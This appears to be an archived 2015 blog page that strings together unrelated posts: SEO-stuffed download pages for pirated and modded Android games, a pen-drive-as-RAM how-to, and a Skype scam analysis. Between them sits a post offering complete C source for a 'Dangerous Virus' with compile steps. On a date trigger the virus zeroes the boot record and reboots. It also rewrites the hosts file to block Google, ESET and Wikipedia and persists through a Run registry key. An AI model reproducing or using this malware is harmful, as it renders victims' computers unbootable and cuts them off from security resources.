Monday, 13 July 2015

Infinite Flight Simulator v14.10.2 Apk

Simulator,Simulator Mobile Game,Simulator Android Mobile Download,Simulator 2015 Android Mobile Game Free Download,Simulator Games List,Simulator Game Download,Simulator Apk File Download,Simulator Game Play,Infinite Flight Simulator Game Free Download,Infinite Flight Simulator Android Game Free Download,Infinite Flight Simulator 2015 Game Free Download,Infinite Flight Simulator Mod Free Download,Infinite Flight Simulator v14.10.2 Apk game Free Download,Infinite Flight Simulator v14.10.2 Apk,Infinite Flight Simulator v14.10.2 Apk Download,Infinite Flight Simulator v14.10.2 Android Download,Infinite Flight Simulator v14.10.2 free Download,Infinite Flight Simulator v14.10.2 android Game,
Infinite Flight Simulator v14.10.2 Apk
Infinite Flight Simulator
Enjoy a fully featured flight simulator in the palm of your hands. Infinite Flight offers the most comprehensive flight simulation experience on mobile devices whether you are a curious novice or an accomplished pilot. Fly a large selection of highly detailed aircraft in regions across the world – day and night – in many atmospheric condition, and with a wide range of weight configurations. Improve your skills with our advanced camera and replay system, letting you scrutinize every portion of your flight.
Simulator,Simulator Mobile Game,Simulator Android Mobile Download,Simulator 2015 Android Mobile Game Free Download,Simulator Games List,Simulator Game Download,Simulator Apk File Download,Simulator Game Play,Infinite Flight Simulator Game Free Download,Infinite Flight Simulator Android Game Free Download,Infinite Flight Simulator 2015 Game Free Download,Infinite Flight Simulator Mod Free Download,Infinite Flight Simulator v14.10.2 Apk game Free Download,Infinite Flight Simulator v14.10.2 Apk,Infinite Flight Simulator v14.10.2 Apk Download,Infinite Flight Simulator v14.10.2 Android Download,Infinite Flight Simulator v14.10.2 free Download,Infinite Flight Simulator v14.10.2 android Game,
Key Features
  • 35 aircraft (17 included + 18 available for purchase): Airbus, Boeing, Embraer, Cessna, Cirrus, etc.
  • 14 regions each covering thousands of square kilometers (7 included + 7 available for purchase)
  • Multiplayer
  • All major airports with precise runway and taxiway layouts
  • Flight planning
  • Instrument Landing System (ILS)
  • Advanced Autopilot Flight Simulator (supports Altitude, Heading, Throttle and Vertical Speed)
  • Advanced replay system
  • Time and weather conditions
  • Weight and balance configuration
  • Introductory and takeoff flight lessons
  • Logbook
  • Achievements
  • And much more…
What’s New
[Hotfix for Android 5.0 crashes]
  • Added 747-400 (FREE), 747-8i/f (Paid) 747-200 (Paid), Air Force One (Paid), NASA Shuttle Carrier (Paid), SOFIA Telescope (FREE with 20+ purchases)
  • Improved airport layout at KSFO, KHAF, KNUQ, KSCK
  • Performance optimizations
  • [Live]
  • Added user reporting. Those with too many reports will be ghosted (temporarily rendered invisible)
  • Bug fixes
  • Active/Inactive runway helpers (Virtual fences, runway ID coloring, etc…)
How to install?
  1. Download the Apk.
  2. Install the Apk in your smartphone and enjoy  :)
Downloads

[Source] Dangerous Virus [Overwrite MBR] [Render Computer Unbootable]

Introduction
This overwrites the MBR with 0's making booting the computer impossible, tested on Windows 7 and Windows 8 + 8.1 = %100 success.
For windows 8 + 8.1 it does not require administrative privileges to use full effect, on windows 7 you must run as administrator.

How to Compile Code
How to start the project:
1. File > New > Project
2. Select "Console Application"
3. Paste the "CODE"

Code
#include <Windows.h>
DWORD WINAPI
CheckTime(){
DWORD write
;
SYSTEMTIME st
;
char data[512];
ZeroMemory(&data,sizeof(data));
GetLocalTime(&st);
//you can change the date of payload to occur.
if(st.wYear==2014){
HANDLE disk
=CreateFile("\\\\.\\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
WriteFile(disk,data,512,&write,NULL);
CloseHandle(disk);
ExitWindowsEx(EWX_REBOOT,0);
}
return 0;
}

DWORD WINAPI hosts
(){
char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
char path[60];
DWORD write
;
GetEnvironmentVariable("windir",path,sizeof(path));
strcat
(path,"\\system32\\drivers\\etc\\hosts");
HANDLE hFile
=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL);
WriteFile(hFile,data,sizeof(data),&write,NULL);
CloseHandle(hFile);
return 0;
}

DWORD WINAPI reg
(){
char value[]="Virus.exe";
HKEY hKey
;
while(1){
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
RegSetValueEx(hKey,"Virus",0,REG_SZ,(LPBYTE)value,60);
RegCloseKey(hKey);
Sleep(10000);
}
return 0;
}

int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
char file[MAX_PATH];
char path[60];
HANDLE hToken
;
LUID luid
;
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
TOKEN_PRIVILEGES tp
;
tp
.Privileges[0].Luid=luid;
tp
.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tp
.PrivilegeCount=1;
OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
GetModuleFileName(NULL,file,sizeof(file));
GetEnvironmentVariable("windir",path,60);
strcat
(path,"\\Virus.exe");
CopyFile(file,path,false);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
while(1){
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL);
Sleep(10000);
}
return 0;
}

Angry Birds Stella 1.1.1 Apk[MOD]

Angry,Angry game,Angry Birds,Angry Birds Game,Angry Birds Game Download,Angry Birds free Download,Angry Birds Game Free Download Mobile,Angry Birds For Android Mobile Download,Angry Birds For android,Angry Birds Mod Free Download,Angry Birds Game Mod Free Download,Angry Birds 2015 Mobile Free Download,Angry Birds 2015 Game Android Download,Angry Birds Apk File Download,Angry Birds games free download for mobile android,
Angry Birds Stella 1.1.1 Apk[MOD]
Angry Birds Stella
Join Stella and her super adventurous friends on a quest to protect their home from the greedy Bad Princess and her powerful piggies! Meet this fierce new bunch, master their amazing superpowers and explore magical Golden Island.Stella has teamed up with Dahlia, Poppy, Willow and Luca. These fearless pals have a strong bond but even stronger personalities. You could even say they’re best friends forever… most of the time.With over 2 billion downloads, Angry Birds is the most popular mobile game franchise of all time. Play this all-new physics-based slingshot adventure and join the global phenomenon!
What’s New ? In 1.1.1
Angry,Angry game,Angry Birds,Angry Birds Game,Angry Birds Game Download,Angry Birds free Download,Angry Birds Game Free Download Mobile,Angry Birds For Android Mobile Download,Angry Birds For android,Angry Birds Mod Free Download,Angry Birds Game Mod Free Download,Angry Birds 2015 Mobile Free Download,Angry Birds 2015 Game Android Download,Angry Birds Apk File Download,Angry Birds games free download for mobile android,

There’s a new Golden Island map full of SPECIAL EVENT LEVELS! Play these extra-challenging levels and:
Meet the NEW PIGS ON THE BLOCK! CrossFit Pig, Boom Pig, Necro Pig, and more! They’re dying to meet you.
DREAM TEAM! Choose which birds to use and when. Strategic and superpowered!
GET RANDOM! A nearly infinite number of levels on the map!
NEW TREASURES! Assemble sets for awesome perks!
XMAS PRESENTS! Play new levels to earn rewards!
Screenshots
Angry,Angry game,Angry Birds,Angry Birds Game,Angry Birds Game Download,Angry Birds free Download,Angry Birds Game Free Download Mobile,Angry Birds For Android Mobile Download,Angry Birds For android,Angry Birds Mod Free Download,Angry Birds Game Mod Free Download,Angry Birds 2015 Mobile Free Download,Angry Birds 2015 Game Android Download,Angry Birds Apk File Download,Angry Birds games free download for mobile android,
Angry Birds Stella 1.1.1 Apk[MOD]

Angry,Angry game,Angry Birds,Angry Birds Game,Angry Birds Game Download,Angry Birds free Download,Angry Birds Game Free Download Mobile,Angry Birds For Android Mobile Download,Angry Birds For android,Angry Birds Mod Free Download,Angry Birds Game Mod Free Download,Angry Birds 2015 Mobile Free Download,Angry Birds 2015 Game Android Download,Angry Birds Apk File Download,Angry Birds games free download for mobile android,
Angry Birds Stella 1.1.1 Apk[MOD]

Angry,Angry game,Angry Birds,Angry Birds Game,Angry Birds Game Download,Angry Birds free Download,Angry Birds Game Free Download Mobile,Angry Birds For Android Mobile Download,Angry Birds For android,Angry Birds Mod Free Download,Angry Birds Game Mod Free Download,Angry Birds 2015 Mobile Free Download,Angry Birds 2015 Game Android Download,Angry Birds Apk File Download,Angry Birds games free download for mobile android,
Angry Birds Stella 1.1.1 Apk[MOD]

Download
Angry Birds Stella 1.1.1  Original Apk (48.1 Mb) | Mirrors
Mod
Angry Birds Stella 1.1.1 Modded Apk (48.3 Mb) | Mirrors
 
 

How to Use Pen Drive As RAM

How to Use Pen Drive As RAM
Nowadays, many programs take lots of memory during operation, which is a nightmare for low RAM systems. So to avoid this make your pen drive/USB of large size as RAM, which will allow your system to handle more operations and tasks. To know how to do this, follow the steps below.

Method 1 of 2: Using a USB Pen Drive as RAM in Windows XP

670px-Use-Pen-Drive-As-RAM-Step-1-Version-2
Step 1 Delete all the stuff on your pen drive.
  • Insert it and let the PC read it (minimum 2 GB).
670px-Use-Pen-Drive-As-RAM-Step-2-Version-2
Step 2 Right click on My Computer.
  • Click on Properties from context menu.
670px-Use-Pen-Drive-As-RAM-Step-3-Version-2
Step 3 Click on the Advanced tab.
670px-Use-Pen-Drive-As-RAM-Step-4-Version-2
 Step 4 Click on Settings under Performance.
670px-Use-Pen-Drive-As-RAM-Step-5-Version-2
Step 5 Click on the Advanced tab.
 670px-Use-Pen-Drive-As-RAM-Step-6-Version-2
Step 6 Click on the Change button under Virtual memory.
670px-Use-Pen-Drive-As-RAM-Step-7-Version-2
Step 7 Select your USB drive.
670px-Use-Pen-Drive-As-RAM-Step-8-Version-2
Step 8 Click on custom size radio button and give the values as follows;
  • Initial Size:1020
  • Maximum size:1020
  • The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size.
670px-Use-Pen-Drive-As-RAM-Step-9-Version-2
Step 9 Click the Set button, then click on OK.
670px-Use-Pen-Drive-As-RAM-Step-10-Version-2
Step 10 Restart the computer with pen drive inserted.
  • The speed of your computer will be increased.

Method 2 of 2: Using a USB Pen Drive as RAM in Windows Vista and Windows 7 and 8

670px-Use-Pen-Drive-As-RAM-Step-11
Step 1 Insert your pen drive and format it.
670px-Use-Pen-Drive-As-RAM-Step-12
Step 2 Right click on your pen drive and click on “Properties”.
670px-Use-Pen-Drive-As-RAM-Step-13
Step 3 Click on ‘Ready boost’ tab and then on ‘Use this device’.
670px-Use-Pen-Drive-As-RAM-Step-14
Step 4 Choose maximum space to reserve system speed
670px-Use-Pen-Drive-As-RAM-Step-15
Step 5 Click on OK and Apply.
 670px-Use-Pen-Drive-As-RAM-Step-16
Tips
  • You must be logged in as Administrator to do this task.
  • If you are using Windows 7, start by doing steps 1 and 2, but then a different window will pop up. Click “Advanced system settings” on the sidebar and continue the steps.
Warnings
  • It may significantly shorten the life of the USB. Normal flash drives have limited numbers of writes. For normal usage, it takes a long time for the writes to run out. However, if used as RAM where millions of transfers are done every minute, the life of the drive may be significantly shortened.
  • Do not remove the USB. It’ll crash your system. However, simply plugging the USB back in and rebooting will fix the crash.

Thursday, 9 July 2015

Scams spreading through Skype



I got a message today on Skype to check out an eBay page with my name on. Sounds great!

Hey $name! Look http://www.ebay.com/new/$username





Another example is:






However, the link was not exactly pointing to eBay:

Not eBay, but what appears to be google.dj







Turns out the actual link behind the eBay one is pointing to:





What follows after is for tracking and to disable the Redirect notice message from Google. For those who are curious, google.dj is a legitimate website of Google for the African country Djibouti.

The what seems to be random numbers is actually just hex for:





When you click the link, you will simply do a Google search for that webpage and visit it. This does not mean google.dj is compromised in any way. As an example, you can use the same link but instead use google.com instead of google.dj.

On the lengthy site mentioned above, you'll get a Javascript which you can view on this Pastebin link:
Scams spreading through Skype
(In short, it does a simple math.random method to serve you a slightly different website each time.)



Fiddler capture






Eventually, you'll end up on a typical weight loss scam website:

Obviously not the real Women's Health website









Trying to leave the website










Long story short.....


Prevention

Install the WOT extension into your browser. (Compatible with most modern browsers)
WOT is a community-based tool and is therefore very useful for these kinds of scams, whereas other users can warn you about the validity.

Use a strong password for Skype and anything else for that matter.

Don't click on "funny" links. A trick is to "hover" on the link to reveal the actual website behind it.



Disinfection

Close your browser.

Change your Skype password immediately. How do I change my password?

If the message came from an unknown contact, How do I report abuse by someone in Skype?

If the message came from a friend, be sure to notify him/her and to follow the steps in this post.

To be sure, you can always run a scan with your favorite antivirus and/or antimalware product. (however, I have not seen any malware in this particular campaign)


Conclusion

In the past, malware has spread via Skype, but this is the first time I'm seeing a scam presented in this way. I have contacted Skype to ask how they were able to hide the actual website behind the eBay link, as I do not know - if you do, be sure to let me know in the comments.

Also, follow the steps above to stay safe.